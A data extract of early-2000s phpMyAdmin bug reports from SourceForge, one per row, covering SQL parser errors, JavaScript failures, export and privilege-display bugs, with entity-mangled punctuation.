Please submit a bug report with the data chunk below BEGIN CUT JElkOiBzcWxwYXJzZXIubGliLnBocCx2IDEuMTUgMjAwMi8wNy8yNiAxODozMDo1OSBsZW05IEV4 cCAkPGJyIC8 CldoeSBkaWQgd2UgZ2V0IGhlcmU IDQ0IDQ1IDYzPGJyIC8 CkxlZnRvdmVyOiD8 PGJyIC8 CkE6IDQ0IDQ1PGJyIC8 ClNRTDogU0VMRUNUICogRlJPTSBgaW5zb2x2YCBXSEVSRSBB ZHJlc3NlIExJS0UgJU38bmNoZW4lIExJTUlUIDAsIDMw END CUT email g.neher gmx.de Original URL https sourceforge.net p phpmyadmin bugs 803 https sourceforge.net p phpmyadmin bugs 803 Original author anonymous Found in version 2.3.0 rc4","bug"
"24444","7173","bug in amp;quot;lets split it up more amp;quot; e.g.
amp;amp; .
2.4.0) amp;quot;select x amp;amp; 1 from t amp;quot; results in amp;quot;select x 1 from t amp;quot; amp;quot;select x amp;amp; 1 from t amp;quot; works sqlparser.lib.php line 429 amp;quot;if first == , ) || first == ; ) || first == . )
|| first = )) amp;quot; notice the single = in the last test.
corecting this leads to a strSQPBugUnknownPunctuation error Thanks for helping flystop gmx.net Original URL https sourceforge.net p phpmyadmin bugs 804 https sourceforge.net p phpmyadmin bugs 804 Original author anonymous Found in version 2.4.0","bug"
"24444","7174","Print options not working in Mozilla.
Mozilla 1.3, win32, the little javascript to print the table structure doesnt do anything in Moz.
kind of sucks opening IE just to print the structure views) not sure if this is a dupe couldnt find anything at first glance) .. or if this is fixed in the 2.5 dev treee .. please let me know if it is, thanks.
Original URL https sourceforge.net p phpmyadmin bugs 805 https sourceforge.net p phpmyadmin bugs 805 Original author piotrbanasik Found in version 2.4.0","bug"
"24444","7175","Doc amp;gt; FAQ [1.23] incorrect answer typo).
In Documentation.html FAQ [1.23] 1\.
Please change dash to underscore .
2\.
Perhaps add the [group] where this variable setting needs to be added.
Current wrong answer Just edit you my.ini file that should be located in your Windows directory and add the following line set variable = lower case table names=0 I suggest to change these 2 lines to Just edit you my.ini file that should be located in your Windows directory and add the following line to the group [mysqld] set variable = lower case table names=0 Hope this helps.
Kind regards, Holger Original URL https sourceforge.net p phpmyadmin bugs 806 https sourceforge.net p phpmyadmin bugs 806 Original author anonymous","bug"
"24444","7176","moved headers .... when i use join syntax left, right) in query with 2 or more tables and select columns from more tables 2nd and next headers are moved by one column right ... for example see attach file ... jenix Original URL https sourceforge.net p phpmyadmin bugs 807 https sourceforge.net p phpmyadmin bugs 807 Original author jenix Found in version 2.5.0 rc1","bug"
"24444","7177","query window amp;gt; amp;gt; import files.
sometimes when I click on Insert data from a textfile into table link will show next lines Notice Undefined variable db in D \jenik\www\temp\admin\tbl properties common.php on line 23 Notice Undefined variable db in D \jenik\www\temp\admin\tbl properties common.php on line 24 Notice Undefined variable table in D \jenik\www\temp\admin\tbl properties common.php on line 24 Warning Cannot modify header information headers already sent by output started at D \jenik\www\temp\admin\tbl properties common.php 23 ) in D \jenik\www\temp\admin\libraries\db table exists.lib.ph p on line 17 in mian window PMA ...
I think, it s when no database is selected in left frame ... jenix ...
Original URL https sourceforge.net p phpmyadmin bugs 808 https sourceforge.net p phpmyadmin bugs 808 Original author jenix","bug"
"24444","7178","SQL error on export SHOW TABLE STATUS problem).
If i select a table and choose export, i get this error The syntax is wrong it should be SHOW TABLE STATUS LIKE table name FROM database name not SHOW TABLE STATUS LIKE table name FROM table name Error SQL query SHOW TABLE STATUS LIKE waka member permissions FROM waka member permissions MySQL said You have an error in your SQL syntax near FROM waka member permissions at line 1 Original URL https sourceforge.net p phpmyadmin bugs 809 https sourceforge.net p phpmyadmin bugs 809 Original author anonymous Found in version Latest Git","bug"
"24444","7179","2.5 rc1 sql error export table.
If i select a table and choose export, i get this error I think the syntax is wrong it should be SHOW TABLE STATUS LIKE table name FROM database name not SHOW TABLE STATUS LIKE table name FROM table name Error SQL query SHOW TABLE STATUS LIKE waka member permissions FROM waka member permissions MySQL said You have an error in your SQL syntax near FROM waka member permissions at line 1 Original URL https sourceforge.net p phpmyadmin bugs 810 https sourceforge.net p phpmyadmin bugs 810 Original author bumperbox Found in version 2.5.0 rc1","bug"
"24444","7180","amp;quot;Skip EXPLAIN sql amp;quot; error.
when is table name without ` quote) and after table name is some definition join, where, order, ...) in query and then click on Explain SQL all is ok ....., but when is Skip Explain SQL clicked following error ... sql query like amp;quot;select from tb name where 1 amp;quot; ...
Original URL https sourceforge.net p phpmyadmin bugs 811 https sourceforge.net p phpmyadmin bugs 811 Original author jenix","bug"
"24444","7181","Missing JS file.
Hy, I dscovered a missing JS file in the libraries directory When on the home page I try to chenge my password httpd authentication) I got an error of an undefined function.
Looking at the page source for user password.php I discovered amp;lt;script src= amp;quot;libraries user details.js amp;quot; amp;gt; When looking at the filesystem on the server the file was missing.
Thinking about an error during copy I checked other 4 machines with the phpMyADmin 2.4.0 installation on all machines this file was missing.
Original URL https sourceforge.net p phpmyadmin bugs 812 https sourceforge.net p phpmyadmin bugs 812 Original author anonymous Found in version 2.4.0","bug"
"24444","7182","for gt; 2.5.0) Edit Existing Record amp; Insert as New Row IE).
With v2.4.0 and 2.5.0 rc1 If you edit an existing record, remove the existing number in an auto increment, and select amp;quot;Insert as a new row amp;quot; does not work as it has in the past.
I always receive cannot load page after hitting the amp;quot;Go amp;quot; button, but records are really added in the following way If you have amp;quot;Go back to previous page amp;quot; selected, then you wind up with 2 new records in the database, and if you have amp;quot;Insert another new row amp;quot; selected, then you only wind up with 1 new record.
If you try to click the back button to go back to the previous screen, you will get the amp;quot;data has expired screen amp;quot; and if you go back to the previous screen, any queries you were using to display the data will be gone.
Not as clean as it was in older versions, don t know with which version it quit working.
Original URL https sourceforge.net p phpmyadmin bugs 813 https sourceforge.net p phpmyadmin bugs 813 Original author lvshadow Found in version 2.5.0 rc1","bug"
"24444","7183","Repeated Insert message on Options page.
Haven t tried on any other page may be the same there.
See attached Jpeg screenshot; I wanted to try out the altering the autoincrement number feature in 2.5, so I used the live demo link off the homepage.
I altered the number, then went to the Insert tab and inserted a new row.
On clicking go, I was taken back to the Options tab with two Inserted rows 1 SQL boxes at the top of the page.
Original URL https sourceforge.net p phpmyadmin bugs 814 https sourceforge.net p phpmyadmin bugs 814 Original author sberriman Found in version 2.5.0 rc1","bug"
"24444","7184","Edit row amp;gt; Insert as new row amp;gt; BLOB missing.
When you edit existing row and want to insert is as new row you lose content of protected fields eg.
BLOB).
Original URL https sourceforge.net p phpmyadmin bugs 815 https sourceforge.net p phpmyadmin bugs 815 Original author nijel Found in version Latest Git","bug"
"24444","7185","User with no priv.
can see status variables.
Every user can see variables and status even if it is turn to off in config.inc.
The information is not on the main page but when you click on databases you have access to it.
The problem i think) is the check of the superuser in server.common.inc.php on line 43.
With mySQL 4.0 any user with create tmp privilege can do use mysql even if they cannot see the tables.
I ve replace the use mysql by a desc mysql.user and it seems to work fine.
Original URL https sourceforge.net p phpmyadmin bugs 816 https sourceforge.net p phpmyadmin bugs 816 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","7186","JS error Expected } .
When an error occurs eg you submit an invalid query or you try to log in without pwd when user has a pwd), an error page is displayed, but a JS error Expected \} ) occurs.
During reload querywindow ) JS function creation, a comment is added, and a needed \} comes in here.
Example code attached see on row 47.
Original URL https sourceforge.net p phpmyadmin bugs 817 https sourceforge.net p phpmyadmin bugs 817 Original author danydany Found in version 2.5.0 rc1","bug"
"24444","7187","query window popup and multiple pma IE window.
I noticed a side effect of the new amp;quot;query window amp;quot; popup while using multiple browser windows IE 6.0.2800.1106).
Following steps are needed to reproduce this behaviour open two new IE, maybe other browsers as well) browser windows, load phpMyAdmin in each of them, in the second !)
one open the query window popup, enter a query there and submit it.
Result The page will be loaded in the first browser window.
I guess it is because each browser window has a frame called phpmain and IE searches a browser window containing that frame in order of their creation.
The problem actually is that I and maybe others) have phpMyAdmin installed on every server MySQL blocked from outside) and therefore use more than one instance of it at the same time.
Having the results of a query of one server in the window of another server is very confusing.
Bugfix This bug might be solved if the main frame phpmain) gets a per server name, i.e.
just append something like md5 cfg[ PmaAbsoluteUri ]) to phpmain .
This would solve the problem with the query result shown amp;quot;on a different server amp;quot; but not the one when using more than one instance on the same server.
Original URL https sourceforge.net p phpmyadmin bugs 818 https sourceforge.net p phpmyadmin bugs 818 Original author ci dev Found in version 2.5.0 rc1","bug"
"24444","7188","query window not working QueryFrameJS false).
I set amp;quot; cfg[ QueryFrameJS ] = FALSE; amp;quot; which results as expected) in opening the query window in main frame.
But there, the navigation bar fails with a JavaScript error document.querywindow.querydisplay tab is null or no object.
Additionally, the navigation bar links are only hashes ), so that it is not possible to use a JavaScript disabled browser configuration.
Original URL https sourceforge.net p phpmyadmin bugs 819 https sourceforge.net p phpmyadmin bugs 819 Original author ci dev Found in version 2.5.0 rc1","bug"
"24444","7189","edit SQL query doesn t select database.
Browse any table of any database but the first one and click edit query .
The query will be shown in the textarea, but the database dropdown is set to the first database available.
The dropdown should default to the amp;quot;active amp;quot; database.
Original URL https sourceforge.net p phpmyadmin bugs 820 https sourceforge.net p phpmyadmin bugs 820 Original author ci dev Found in version 2.5.0 rc1","bug"
"24444","7190","tbl dump.php syntax error ===.
In tbl dump.php 2.5.0 rc1 it is line 2.5.0 rc1) it says if dump buffer === 8) \{ === should be == Original URL https sourceforge.net p phpmyadmin bugs 821 https sourceforge.net p phpmyadmin bugs 821 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","7191","FULLTEXT index not kept with MySQL 4.
I have a table with al FULLTEXT index.
When I edit this index the dropdown menu labeled amp;quot;Index type amp;quot; is always set to INDEX instead of FULLTEXT.
I think FULLTEXT should be preselected because that s the type of the index I m editing.
Original URL https sourceforge.net p phpmyadmin bugs 822 https sourceforge.net p phpmyadmin bugs 822 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","7192","Privileges table names with char escaped wrong.
When adding user privileges to a user that do not have access to a complete db, but rather, only certain tables, and those tables have chars in them, the names show up escaped in the privilege list.
ie amp;quot;form request amp;quot; becomes amp;quot;form\ request amp;quot;.
User cannot view table, and it does not show up on the table list as being accessible afterwords.
When trying to revoke the privilege, you get the following error There is no such grant defined for user someuser on host localhost on table form\\ request I am giving the user select , update , alter , create and insert abilities only to roughly 10 tables within a single db containing roughly 40.
Original URL https sourceforge.net p phpmyadmin bugs 823 https sourceforge.net p phpmyadmin bugs 823 Original author johnseth Found in version 2.5.0 rc1","bug"
"24444","7193","amp;shy; s get lost.
I searched for the cause of a certain link stored in the database not working when displayed.
The cause was the link was stored as http www.foobar.c amp;amp;shy;om something that IE interprets as http www.foobar.c om ie a link that is not valid PHPMyAdmin never visibly reveals the amp;amp;shy; character, it can only be found when copying a text from phpmyadmin into ie the address bar.
Original URL https sourceforge.net p phpmyadmin bugs 824 https sourceforge.net p phpmyadmin bugs 824 Original author anonymous","bug"
"24444","7194","JavaScript error.
On a lot of pages there is an JavaScript Error... we can see a DOT but no text after... this error is only in rc2... because on page rc1 it works fine...
Example Line 466 Car 277 Erreur ) attendu Code 0 URL http localhost mysql tbl properties structure.php?
lang=fr iso 8859 1 amp;amp;server=1 amp;amp;db=db amp;amp;table= admin dlvl Original URL https sourceforge.net p phpmyadmin bugs 825 https sourceforge.net p phpmyadmin bugs 825 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","7195","drawing tables after relations.
between 1.47 And 1.48 version of pdf shema.php file around line 1220 the instruction this amp;gt;PMA RT drawTables show info); was put before drawing relations so the relation are above tables that is very strange.
This instruction should be place after for ex line 1223 Good luck Original URL https sourceforge.net p phpmyadmin bugs 826 https sourceforge.net p phpmyadmin bugs 826 Original author mdelorme Found in version 2.5.0","bug"
"24444","7196","2.5.0 rc2) wrong title on foreign db relation.
if for a relation a real foreign db is set, I can click on this field in browse and will then be directed to the record in the foreign db.
But when I move the mouse over the id in the master db the title does not show the foreign table field.
It shows the field, which is defined for the table with the same name in the master db.
Original URL https sourceforge.net p phpmyadmin bugs 827 https sourceforge.net p phpmyadmin bugs 827 Original author j0erch","bug"
"24444","7197","SQL unusable without JavaScript.
When JavaScript is switched off, you can t post SQL query, just because form is printed ONLY by script amp;lt;script amp;gt; document.writeln amp;lt;form method= amp;quot;post amp;quot; target= amp;quot;phpmain top.frames.nav.document.hashform.hash.value amp;quot; action= amp;quot;read dump.php3 amp;quot; enctype= amp;quot;multipart form data amp;quot; ); amp;lt; script amp;gt; onsubmit= amp;quot;return checkSqlQuery this) amp;quot; name= amp;quot;sqlform amp;quot; amp;gt; Original URL https sourceforge.net p phpmyadmin bugs 828 https sourceforge.net p phpmyadmin bugs 828 Original author nijel Found in version Latest Git","bug"
"24444","7198","problems with varchar mysql 4.1.0.
I just upgraded from MySQL 4.0.12 to 4.1.0.
Now, when trying to edit an existing row or inserting a new row, any line with type varchar is messed up.
It s not possible to enter any value in the textinput box at all.
See attached screencap.
Thanks, Magnus mj bop.nu Original URL https sourceforge.net p phpmyadmin bugs 829 https sourceforge.net p phpmyadmin bugs 829 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","7199","SQL Error when copying table.
steps to repro create two tables make a relation from table1 to table2 copy table1 via amp;quot;Operations amp;quot; tab = amp;gt; SQL Error double entry in table pma relation Original URL https sourceforge.net p phpmyadmin bugs 830 https sourceforge.net p phpmyadmin bugs 830 Original author j0erch","bug"
"24444","7200","french version Insert data missing.
Hi, I sometime test your french version... and I found a little bug the option amp;quot;Insert data from a textfile into table amp;quot; is missing in french page Structure and SQL pages) Also, it seems that french version has many javascript errors...
Regards Franxc3xa7ois Original URL https sourceforge.net p phpmyadmin bugs 831 https sourceforge.net p phpmyadmin bugs 831 Original author efergy Found in version 2.5.0 rc2","bug"
"24444","7201","height raw.
the lines 477 and 478 of pdf schema.php should be replace by il = this amp;gt;FontSize; h= il 1) nb; to have a correct output bug appears if comments are more than 3 lines long) Original URL https sourceforge.net p phpmyadmin bugs 832 https sourceforge.net p phpmyadmin bugs 832 Original author mdelorme Found in version 2.5.0 rc2","bug"
"24444","7202","Table specific privilegs don t show until selected.
I m using 2.5.0rc2 with an updated server priveleges.php file from CVS.
The systems I m using are using PHP 4.2.2, and MySQL systems are using 3.23.56.
When setting user privileges to specific tables and not an entire database, the priviliges do not show in the database specific priviliges fields.
Example Click amp;quot;Privileges amp;quot; from opening page.
Edit user amp;quot;testuser amp;quot; privileges by clicking on amp;quot;Edit amp;quot; link.
Give user SELECT, ALTER, UPDATE, and INSERT privileges to database amp;quot;testdb amp;quot;.
Next, give user SELECT access to amp;quot;table1 amp;quot;, and SELECT, INSERT, ALTER, UPDATE access to amp;quot;table3 amp;quot; on database amp;quot;test2db amp;quot;.
Do not give any access to amp;quot;table2 amp;quot; or amp;quot;table4 amp;quot; on amp;quot;test2db amp;quot;.
The resulting display in phpMyAdmin is that database amp;quot;testdb amp;quot; shows up with SELECT, INSERT, UPDATE, ALTER privileges; no Grant privilege, and no table specific privileges.
However, database amp;quot;test2db amp;quot; does not show up as having limited access with table specific privileges, as user should neither have USAGE access to other tables, nor know of their presence.
In my case, I have users with a specific login name that utilize phpMyAdmin to update the tables, however the database contains tables they should not have any information about.
I m not sure if this is a legitimate amp;quot;bug amp;quot;, or if this should be considered a feature request.
Original URL https sourceforge.net p phpmyadmin bugs 833 https sourceforge.net p phpmyadmin bugs 833 Original author johnseth Found in version 2.5.0 rc2","bug"
"24444","7203","error when db is changed.
when I select some DB then open a QueryWindow QW) then selest another DB and click on another link in top of QW browse write error ... for details see attachment ... in PMA 2.5.0 rc3 ...
Original URL https sourceforge.net p phpmyadmin bugs 834 https sourceforge.net p phpmyadmin bugs 834 Original author jenix","bug"
"24444","7204","Importing with 2.5.0 rc2 or 2.4.0.
2.3.3pl1 is one of the few versions I can still import with.
I receive the following mySQL error message when importing anything using the command amp;quot;Insert data from a textfile into table amp;quot;.
If you can t reproduce this, please let me know and perhaps I ll try other versions as well... or any other suggestions.
====================== Error SQL query LOAD DATA INFILE tmp phpTHYoIT INTO TABLE `test table` FIELDS TERMINATED BY , ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \n MySQL said Access denied for user user name localhost Using password YES) Back Original URL https sourceforge.net p phpmyadmin bugs 835 https sourceforge.net p phpmyadmin bugs 835 Original author macmeister","bug"
"24444","7205","parse error .. display tbl.lib.php3 on 444. phpMyAdmin 2.5.0 rc2 amp;amp; rc1 MySQL 3.23.54 PHP Version 3.0.15 dev trying to simply amp;quot;browse amp;quot; or amp;quot;select amp;quot; any table Parse error parse error in .
libraries display tbl.lib.php3 on line 444 Is the PHP Version too old for the php3 Version of phpMyAdmin now?
2.3.2 and 2.4.0 are working.
Original URL https sourceforge.net p phpmyadmin bugs 836 https sourceforge.net p phpmyadmin bugs 836 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","7206","\n bug on edit row with 2.5.0 rc2.
if you create a table with a text field and then insert \n , you cannot edit this row afterwards.
try this CREATE TABLE `n test table` `data` text NOT NULL); INSERT INTO `n test table` VALUES 0x686920677579735c6e20686f772061726520796f753f); and then try to edit the row with 2.5.0 rc2.
chris Original URL https sourceforge.net p phpmyadmin bugs 837 https sourceforge.net p phpmyadmin bugs 837 Original author em gotcha Found in version 2.5.0 rc2","bug"
"24444","7207","Linked field dropdown not shown if.... Insert new row Linked field dropdowns are not shown if the current !)
table has more than 200 records.
See libraries get foreign.lib.php 30 the total = PMA countRecords db, table, TRUE); This should better read the total = PMA countRecords foreign db, foreign table, TRUE); ?
;) regards Stefan stefan.elssner comware.de Original URL https sourceforge.net p phpmyadmin bugs 838 https sourceforge.net p phpmyadmin bugs 838 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","7208","Clear passwords in cookies.
Is it just me or does it seem like storing the user name and passwords in cookies as clear text is a serious security hole.
Particularly since they re named so obviously as pma cookie password and pma cookie username ???
Seems like a simple fix to store the cookie authentication as a hash instead.
Original URL https sourceforge.net p phpmyadmin bugs 839 https sourceforge.net p phpmyadmin bugs 839 Original author anonymous","bug"
"24444","7209","2.5.0 rc2) exporting data.
when I exporting data from tqable where is column type text, this text is exported as x hexstring .... i have windows, MySQL 4.0.12, PHP 4.3.2 rc2 , but on net [www.phpmyadmin.net] I test it too ...... in test table ....
Original URL https sourceforge.net p phpmyadmin bugs 840 https sourceforge.net p phpmyadmin bugs 840 Original author jenix Found in version 2.5.0 rc2","bug"
"24444","7210","Errors in CSV Dump.
At doing a csv dump from tables, there are errors with no initiated variables.
Error in File tbl dump.php Line 358!
Variable table, limit to, limit from must be initiated!
That s all!
Bye MJ Original URL https sourceforge.net p phpmyadmin bugs 842 https sourceforge.net p phpmyadmin bugs 842 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","7211","quot;Undefined index querytime quot;.
I m seeing a amp;quot;Warning Undefined index querytime in home democra2 dbadmin libraries display tbl.lib.php on line 1586 amp;quot; when I execute a select against an InnoDB in MySQL 4.0.0 alpha the strange choice of my hosting company) with PHP 4.0.5.
Original URL https sourceforge.net p phpmyadmin bugs 841 https sourceforge.net p phpmyadmin bugs 841 Original author smagruder Found in version 2.5.0 rc2","bug"
"24444","7212","All databases displayed in the left pane.
phpMyAdmin shows all tables on the left even when setting up a control user.
in mysql.user all users do not have any rights.
The accessable dbs are set in mysql.db so I need another user control user).
It reads the rights correctly but displays all dbs, even such dbs the user cannot access to.
When I comment out the line if PMA MYSQL INT VERSION amp;gt;= 40002) \{ is safe show dbs = ON ; \} in common.lib.php it works just fine.
Using Apache 2.0.45, PHP 4.3 and MySQL 4.0.12.
Original URL https sourceforge.net p phpmyadmin bugs 844 https sourceforge.net p phpmyadmin bugs 844 Original author jokey","bug"
"24444","7213","Not all databases are listed in the left frame.
I have created 4 other databases apart from the mysql and test databases giving me a total of 6 databases.
The only problem is that I can only see 5.
The last database that I added does not show in the left, yet I can see it when I click on the amp;quot;databases amp;quot; link on the home page.
Accessing it from there if fine except that the occassional javascript error is displayed as it tries to update the non existant entry on the left frame.
The left frame is running in expando mode, not dropdown list mode.
My configuration is Win2K Pro phpMyAdmin 2.4.0 php 4.3.0 Win32 MySQL 4.0.8 gamma nt running on localhost as root localhost Original URL https sourceforge.net p phpmyadmin bugs 843 https sourceforge.net p phpmyadmin bugs 843 Original author mrsmiley18 Found in version 2.4.0","bug"
"24444","7214","Won t fix) Bookmark [VARIABLE] Problem.
I m currently using PhpMyAdmin 2.5.0 rc2, PHP 4.2.3, and MySQL 3.23.56 running on RedHAT Linux..
I m working with the new [VARIABLE] feature in Bookmarked SQL queries, but I m running into a problem.
PHPMyAdmin appears to be inserting the string no quotes) amp;quot; \{1\} amp;quot; before the variable word, and amp;quot; \{2\} amp;quot; after it.
Example Host localhost var lib mysql mysql.sock Generation Time May 09, 2003 at 11 11 AM Server version 3.23.56 PHP Version 4.2.3 Database `test` Table structure for table `BrokenVariablesTest` Creation May 09, 2003 at 10 56 AM Last update May 09, 2003 at 10 57 AM CREATE TABLE `BrokenVariablesTest` `ID` tinyint 1) unsigned NOT NULL auto increment, `Name` varchar 255) NOT NULL default , PRIMARY KEY `ID`) ) TYPE=MyISAM; Dumping data for table `BrokenVariablesTest` INSERT INTO `BrokenVariablesTest` VALUES 1, David ); INSERT INTO `BrokenVariablesTest` VALUES 2, Bob ); INSERT INTO `BrokenVariablesTest` VALUES 3, Joan ); INSERT INTO `BrokenVariablesTest` VALUES 4, Sue ); Add the Following query to the PMA Bookmark table SELECT FROM `BrokenVariablesTest` WHERE `Name` LIKE [VARIABLE] Now, I type select the query I made in PMA Bookmark from the drop down list in the SQL window, I type amp;quot;dav amp;quot; without quotes) in the box for amp;quot;Variable amp;quot;, click the amp;quot;Go amp;quot; button...the query executes, but returns no results...the query is displayed as SELECT FROM `BrokenVariablesTest` WHERE `Name` LIKE \{1\}dav \{2\} LIMIT 0 , 30 It looks like it s just adding \{1\} and \{2\} to the string, I have no idea why.
Thank you for your time.
Original URL https sourceforge.net p phpmyadmin bugs 845 https sourceforge.net p phpmyadmin bugs 845 Original author atad Found in version 2.5.0 rc2","bug"
"24444","7215","2.5.0 rc1) innoDB MaxExactCount ERROR?.
Hi, having MaxExactCount set to 2000 and selecting a 10Mio.
row innodb table from the left page lets the server calculate nearly one minute to show even the table overview tbl properties structure.php).
Could it be that MaxExactCount is not respected when looking at the table properties?
I am using php 4.3.1 mysql 4.0.12 and phpmyadmin 2.5.0 rc1 regards, Christian Original URL https sourceforge.net p phpmyadmin bugs 846 https sourceforge.net p phpmyadmin bugs 846 Original author anonymous Found in version 2.5.0 rc1","bug"
"24444","7216","Page number pull down 40 MB big html.
Hi, phpmyadmin 2.5.0 rc2 produces 40 MB of html code when browsing through a table with 10 Mio.
rows.
The reason The option field amp;quot;page number amp;quot; contains 357.366 options !!!).
Maybe you can find another amp;quot;page number amp;quot; pulldown structure maybe logarithmic?)
Or for page numbers amp;gt; 1000 to just have an edit filed to enter the number manually.
Thank you and best regards, Christian Original URL https sourceforge.net p phpmyadmin bugs 847 https sourceforge.net p phpmyadmin bugs 847 Original author anonymous Found in version 2.5.0 rc2","bug"
"24444","7217","Show 0 instead real count for InnoDB tables.
Hi, when looking at the database overview listinig of all tables in one database) phpmyadmin should show the raw row numbers RECORDS) of innodb tables rather than just showing 0.
Please use only the raw row number since it is much much faster than a count ) with innoDB.
Best regards, Christian Original URL https sourceforge.net p phpmyadmin bugs 848 https sourceforge.net p phpmyadmin bugs 848 Original author anonymous","bug"
"24444","7218","Only save query in history when no error occured.
non error history isn t regular feature of PMA ???
....
Original URL https sourceforge.net p phpmyadmin bugs 849 https sourceforge.net p phpmyadmin bugs 849 Original author jenix","bug"
"24444","7219","Bad targets frame name links open in new window).
Since version 2.5.0 final) you must have modified something in the JavaScript code that doesn t work properly with Apple s browser Safari.
When selecting a database from the popup menu in the left navigation frame, the main frame doesn t load its tables page.
It remains unchanged.
As far as I could test, it s an Safari only issue.
It works fine on Mozilla browsers.
Original URL https sourceforge.net p phpmyadmin bugs 850 https sourceforge.net p phpmyadmin bugs 850 Original author kaino Found in version Latest Git","bug"
"24444","7220","amp;quot;insert another new row amp;quot; is not kept.
In Table INSERT mode, if check amp;quot;Insert another new row amp;quot; and then click amp;quot;Go amp;quot;, on the next screen its value changes back to amp;quot;Go back to previous page amp;quot;.
Instead it should remember its state.
Original URL https sourceforge.net p phpmyadmin bugs 851 https sourceforge.net p phpmyadmin bugs 851 Original author anonymous","bug"
"24444","7221","Frames not show in Opera 6 for Linux.
After login, index.php only displays contents of amp;quot;left.php amp;quot; no more frames or anything...
Very distrurbing!
Original URL https sourceforge.net p phpmyadmin bugs 852 https sourceforge.net p phpmyadmin bugs 852 Original author anonymous Found in version Latest Git","bug"
"24444","7222","Incorrectly detects presence of GD2.
Ihave php compiled with GD1.8.3, but the defines.inc.php file detects GD2 as the function exists, but when calling GD2 functions php returns a warning amp;quot;required GD2 or later amp;quot; It also seems as though there is no easy way to determine the version linked with as the amp;quot;gd info amp;quot; isn t available unless you use php 4.3.0 or greater..
I just defined PMA IS GD2 to 0 in config.inc.php as a temp fix.
Original URL https sourceforge.net p phpmyadmin bugs 853 https sourceforge.net p phpmyadmin bugs 853 Original author urkle","bug"
"24444","7223","Edit link error.
the [Edit] link above sql query doesn t work ... set focus yes update sql query textarea no .. some javascript problem ...
Original URL https sourceforge.net p phpmyadmin bugs 854 https sourceforge.net p phpmyadmin bugs 854 Original author jenix","bug"
"24444","7224","No confirmation on dropping databases.
Clicking on Home amp;gt; Databases amp;gt; select a database) amp;gt; Go will drop the database without asking for confirmation first.
Original URL https sourceforge.net p phpmyadmin bugs 855 https sourceforge.net p phpmyadmin bugs 855 Original author mrsmiley18 Found in version 2.5.0 rc2","bug"
"24444","7225","quot;Query window quot; JS error.
From dant swissconnex.com Version 2.5.0 rc2 When clicking amp;quot;Query window amp;quot; screen bottom left) then choosing the amp;quot;Import files amp;quot; tab, the following error comes up JavaScript Error Line 86 Error ) expected Then the amp;quot;Insert data from a textfile into table amp;quot; link does not show.
This was reported in requests 729446, 734864, 736064 but is still not addressed.
It does not only happen with the French version.
Thanks, Dan Original URL https sourceforge.net p phpmyadmin bugs 856 https sourceforge.net p phpmyadmin bugs 856 Original author anonymous","bug"
"24444","7226","Dump upload timeout problem.
mySQL 3.23.39 phpMyAdmin 2.5.0 rc2 Server Win2k, IIS Fast cable connection Tried with IE6, NS 7, Mozilla 1.3 not a browser issue) Trying to insert recs from a 5 mb .csv file to my remote server using amp;quot;SQL amp;quot; tab then amp;quot;Insert data from a textfile into table amp;quot;.
After a while less than 300 secs), I get this timeout message Fatal error Maximum execution time of 300 seconds exceeded in C \Inetpub\wwwroot\xyz\Site\sqladmin\ldi check.php on line 21 On my demand, the ISP changed amp;quot; cfg[ ExecTimeLimit ] = 300 amp;quot; variable located in amp;quot;config.inc.php amp;quot; and set it to 0 zero) which should cancel the timeout, but I still get the same timeout error.
It seems like above mentioned var.
is not taken into account.
The same happens when I work with a .sql file.
I noticed that about 20 of the forum messages relate to problems with dump upload issues.
On my local machine, I have phpMyAdmin 2.3.2 which inserts perfectly 8546 records inserted in less than 10 sec.).
Thanks, Dan Original URL https sourceforge.net p phpmyadmin bugs 857 https sourceforge.net p phpmyadmin bugs 857 Original author dbworm Found in version 2.5.0 rc2","bug"
"24444","7227","Hanging IE6.
With the latest WinXP and IE6 with all patches, phpMyAdmin hangs when trying to view tables with a large number of entries and or large text fields.
Pages display find under Opera and Netscape, so it appears to be an IE compatibility issue.
Have not tried with other versions of IE.
Original URL https sourceforge.net p phpmyadmin bugs 859 https sourceforge.net p phpmyadmin bugs 859 Original author anonymous Found in version 2.5.0","bug"
"24444","7228","light tabs don t show properly.
When light tabs are enabled e.g.
links are supposed to be shown as [ link ] [ link ], they end up showing like this, instead of all one one line [ Structure ] [ SQL ] [ Export ] [ Search ] [ Query ] [ Drop ] When copying and pasting, they end up on one line, so it seems that there s some kind of table there that isn t wide enough.
Original URL https sourceforge.net p phpmyadmin bugs 858 https sourceforge.net p phpmyadmin bugs 858 Original author anonymous","bug"
"24444","7229","Create PHP Code .... see the foloving code sql = SELECT \ ; sql .= \ FROM PASSWORD WHERE binary `pass` \ ; sql .= \ LIKE \ SQL \ ; more back slash than need ....
???)
Original URL https sourceforge.net p phpmyadmin bugs 860 https sourceforge.net p phpmyadmin bugs 860 Original author jenix","bug"
"24444","7230","SELECT 5 DIV 2. query SELECT 5 DIV 2 amp;gt; 2) changes to SELECT 5 DIV2 amp;gt; 5) Original URL https sourceforge.net p phpmyadmin bugs 861 https sourceforge.net p phpmyadmin bugs 861 Original author anonymous Found in version 2.5.0","bug"
"24444","7231","Undefined offset 0 in relation.lib.php3.
This happens sometimes) when the SQL history is empty for a user.
Original URL https sourceforge.net p phpmyadmin bugs 862 https sourceforge.net p phpmyadmin bugs 862 Original author lem9","bug"
"24444","7232","Backquotes in Export.
If I not check Enclose names with backquotes in Export, PHP says Notice Undefined index id in c \www\phpmyadmin\libraries\build dump.lib.php on line 282 for each column.
The problem is that PMA fieldTypes returns array with keys as backquoted field name.
Original URL https sourceforge.net p phpmyadmin bugs 863 https sourceforge.net p phpmyadmin bugs 863 Original author jakubvrana Found in version 2.5.0","bug"
"24444","7233","Undefined index scheme.
i have been more errors warnings at the file amp;quot;http server.net mysql main.php?lang=de iso 8859 1 amp;amp;server=1 amp;quot; after the install.
